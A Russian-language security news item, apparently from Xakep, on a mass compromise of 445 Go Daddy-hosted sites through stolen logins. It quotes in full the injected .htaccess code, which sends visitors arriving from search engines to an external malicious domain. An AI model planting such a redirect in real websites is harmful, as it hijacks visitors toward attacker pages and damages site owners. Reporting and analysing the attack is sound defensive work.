Пользователи Go Daddy пострадали от массового взлома

Рекомендуем почитать:

Xakep #299. Sysmon

Массовая атака на 445 сайтов заключалась в внедрении вредоносного редиректа в
файлы .htaccess. Go Daddy быстро устранили враждебный код, чтобы обезопасить
своих потребителей и восстановить полный контроль над зараженными сайтами.

Директор по информационной безопасности компании Go Daddy, Тод Редфут,
рассказал домену Wire: "Аккаунты были взломаны при помощи паролей и логинов
пользователей".

Пока неясно как были получены пароли, необходимые для осуществления атаки,
однако, скорее всего, объяснением может послужить целевая фишинговая атака. Go
Daddy продолжают расследование, но Редфут предполагает, что корень массовой
атаки нужно искать за пределами контроля Go Daddy.

"Инфраструктура не была нарушена, поэтому наши клиенты не должны пострадать",
- заявляет он.

Фирма, занимающаяся веб-безопасностью, Securi, предупредила о массовой атаке
в четверг. В записи в

блоге, посвященной атаке, они говорят о том, что вредоносный код был скорее
направлен против пользователей, которые заходили на пораженные домены через
Google или другие поисковики, чем против тех покупателей, которые выходили на
сайт напрямую. Такой вид мошенничества часто является неотъемлемой частью
манипуляционных атак на поисковики, разработанных с целью переадресации
пользователей, находящихся в поиске определенного контента:.

RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC] RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L]

Подобный тип мошенничества часто основывается на неправильной установке
WordPress и схожих систем. Таким образом, бесцеремонная кража паролей в данном
случае является подтверждением того факта, что злоумышленники становятся все
более и более агрессивными в своей охоте за потенциальными жертвами.

Пользователи Go Daddy пострадали от массового взлома

Xakep #299. Sysmon

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Нетипичная змея. Реверсим приложение на Python c кастомным интерпретатором

Картинки в водопаде. Учимся рисовать изображения радиоволнами

Agent Tesla. Учимся реверсить боевую малварь в Ghidra

HTB Surveillance. Эксплуатируем инъекцию команд через скрипт ZoneMinder

Трюки

Липовый соникс. Реверсим картридж Liposonix и пишем его эмулятор

Новая диета для Linux. Загружаем современный Linux, используя минимум памяти

Фишинг в соцсетях. Как социальные сети помогают хакерам

Сделай мне красиво! Изобретаем персональный нейросетевой фотоувеличитель

Последние новости

Microsoft удалила WizardLM 2 LLM, не прошедшую тест на токсичность, но пользователи ее сохранили

Google снова откладывает отключение сторонних cookie

Исследователь заявляет, что взломал DRM-технологию Microsoft

Умный телевизор Hisense случайно вывел из строя Windows-компьютер владельца

Количество атак на мобильные устройства в России возросло в 5,2 раза